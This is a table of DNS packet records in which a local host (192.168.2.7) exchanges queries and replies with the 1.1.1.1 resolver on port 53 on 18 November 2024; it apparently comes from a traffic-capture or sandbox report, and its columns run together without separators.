Timestamp    Source Port    Dest Port    Source IP    Dest IP
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:21.522300959 CET53625461.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:21.544591904 CET6250953192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:21.551548958 CET53625091.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:23.163593054 CET6550753192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:23.171281099 CET53655071.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:25.177212000 CET5992553192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:25.184458017 CET53599251.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:26.026163101 CET5475153192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:26.033684969 CET53547511.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:27.525762081 CET5185953192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:27.533359051 CET53518591.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:28.401807070 CET5227653192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:29.167733908 CET53522761.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:29.842891932 CET5456753192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:29.852483034 CET53545671.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:31.214260101 CET6214353192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:31.221879005 CET53621431.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:31.231493950 CET5450753192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:31.239085913 CET53545071.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:31.747332096 CET4936553192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:31.754686117 CET53493651.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:33.033528090 CET6285553192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:33.040740013 CET53628551.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:33.041539907 CET5437753192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:33.049161911 CET53543771.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:33.049719095 CET5218153192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:33.057276964 CET53521811.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:33.538203001 CET6539953192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:33.545430899 CET53653991.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:35.307002068 CET5844753192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:35.314340115 CET53584471.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:36.168425083 CET5455653192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:36.176382065 CET53545561.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:37.826172113 CET5691453192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:37.850183964 CET53569141.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:39.575613022 CET5384653192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:39.583297014 CET53538461.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:40.837444067 CET5754353192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:40.857367039 CET53575431.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:42.408471107 CET6381653192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:42.416353941 CET53638161.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:43.627800941 CET4964553192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:43.635176897 CET53496451.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:45.265758038 CET6414653192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:45.272682905 CET53641461.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:46.185914993 CET4978953192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:46.193126917 CET53497891.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:47.207046986 CET5841453192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:47.214354992 CET53584141.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:48.512634039 CET5682253192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:48.520189047 CET53568221.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:49.387227058 CET6293553192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:49.394349098 CET53629351.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:50.051191092 CET6326453192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:50.058674097 CET53632641.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:50.872971058 CET5432453192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:50.880330086 CET53543241.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:23.535950899 CET53495731.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:23.550672054 CET5324653192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:23.736596107 CET53532461.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:24.387950897 CET5392853192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:24.395344973 CET53539281.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:24.695293903 CET5178753192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:24.702584982 CET53517871.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:24.804325104 CET5431353192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:24.811177969 CET53543131.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:24.812136889 CET6103353192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:24.819679976 CET53610331.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:25.544473886 CET5092453192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:25.552053928 CET53509241.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:26.417037964 CET5020353192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:26.424454927 CET53502031.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:27.159039021 CET5815953192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:27.168678045 CET53581591.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:27.891793013 CET5592253192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:27.899163008 CET53559221.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:28.590022087 CET6169253192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:28.597253084 CET53616921.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:28.754086018 CET5197653192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:28.761904001 CET53519761.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:29.278327942 CET5597853192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:29.286314964 CET53559781.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:30.543776989 CET6017853192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:30.550678015 CET53601781.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:30.780848980 CET4969553192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:30.788256884 CET53496951.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:30.788794994 CET4922853192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:30.795870066 CET53492281.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:31.636745930 CET5389153192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:31.643652916 CET53538911.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:32.301737070 CET6538553192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:32.308984041 CET53653851.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:32.325567007 CET6552953192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:32.333270073 CET53655291.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:33.445179939 CET5832453192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:33.452539921 CET53583241.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:33.829890966 CET6230253192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:33.836853981 CET53623021.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:34.519851923 CET5148953192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:34.527332067 CET53514891.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:35.286789894 CET5629753192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:35.295272112 CET53562971.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:35.472955942 CET5271553192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:35.481640100 CET53527151.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:36.179816008 CET5737553192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:36.370089054 CET53573751.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:37.150513887 CET6080053192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:37.158102989 CET53608001.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:37.850018024 CET5744753192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:37.857180119 CET53574471.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:39.336227894 CET6111853192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:39.343651056 CET53611181.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:39.412381887 CET5293853192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:39.419786930 CET53529381.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:02.400401115 CET53653871.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:02.554713964 CET5692453192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:02.561991930 CET53569241.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:03.066330910 CET5364853192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:03.073455095 CET53536481.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:03.239674091 CET5734153192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:03.247343063 CET53573411.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:04.061347961 CET5508153192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:04.068376064 CET53550811.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:05.202946901 CET6122953192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:05.210612059 CET53612291.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:05.592974901 CET5963953192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:05.600533009 CET53596391.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:05.904050112 CET5375853192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:05.912170887 CET53537581.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:06.098073006 CET6370253192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:06.105413914 CET53637021.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:06.817307949 CET5105253192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:06.824865103 CET53510521.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:07.421506882 CET6271053192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:07.428832054 CET53627101.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:07.667074919 CET5557753192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:07.675997972 CET53555771.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:08.367508888 CET5530953192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:08.375482082 CET53553091.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:08.586687088 CET5168353192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:08.595531940 CET53516831.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:09.270189047 CET5367153192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:09.277899981 CET53536711.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:09.372019053 CET5945353192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:09.379904032 CET53594531.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:10.158437967 CET5554553192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:10.166512012 CET53555451.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:10.239902973 CET6046753192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:10.247818947 CET53604671.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:11.029144049 CET5308253192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:11.037100077 CET53530821.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:11.085146904 CET5992853192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:11.092307091 CET53599281.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:11.941771030 CET6143353192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:11.949701071 CET53614331.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:12.634742022 CET5100953192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:12.642368078 CET53510091.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:12.740525007 CET5577353192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:12.748471975 CET53557731.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:13.322921038 CET6530653192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:13.330122948 CET53653061.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:13.334281921 CET4986453192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:13.341084957 CET53498641.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:13.596249104 CET4956953192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:13.604540110 CET53495691.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:14.758394003 CET5034753192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:14.765487909 CET53503471.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:15.099328995 CET5100953192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:15.106720924 CET53510091.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:15.465641975 CET5937253192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:15.473191023 CET53593721.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:33.944257975 CET53647541.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:34.558624983 CET5812953192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:34.566488028 CET53581291.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:35.420573950 CET5723753192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:35.427711010 CET53572371.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:36.918647051 CET5900853192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:36.926429033 CET53590081.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:37.217933893 CET5450753192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:37.226114035 CET53545071.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:37.615261078 CET4933853192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:37.646121979 CET4933853192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:37.798254967 CET53493381.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:37.798295021 CET53493381.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:38.085629940 CET5227253192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:38.095590115 CET53522721.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:38.481383085 CET6456253192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:38.488301039 CET53645621.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:38.955117941 CET5502153192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:38.962125063 CET53550211.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:39.630703926 CET5781953192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:39.639116049 CET53578191.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:39.952658892 CET5910553192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:39.960383892 CET53591051.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:40.498167992 CET6128153192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:40.505208015 CET53612811.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:40.506052971 CET6281353192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:40.513390064 CET53628131.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:40.985797882 CET6240853192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:40.993443966 CET53624081.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:41.360524893 CET5964453192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:41.368411064 CET53596441.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:41.718599081 CET6170853192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:41.725897074 CET53617081.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:42.065766096 CET6347753192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:42.073019028 CET53634771.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:42.932074070 CET5558953192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:42.940227032 CET53555891.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:43.196856022 CET5658353192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:43.204468012 CET53565831.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:44.063513994 CET6014853192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:44.071475029 CET53601481.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:44.583108902 CET5569953192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:44.591011047 CET53556991.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:45.451430082 CET5911553192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:45.459870100 CET53591151.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:45.530579090 CET5361853192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:45.552273035 CET5361853192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:45.559254885 CET53536181.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:45.718513012 CET53536181.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:46.311122894 CET5082953192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:46.318339109 CET53508291.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:47.132097006 CET5413653192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:47.139082909 CET53541361.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:47.991430998 CET5950853192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:47.998436928 CET53595081.1.1.1192.168.2.7
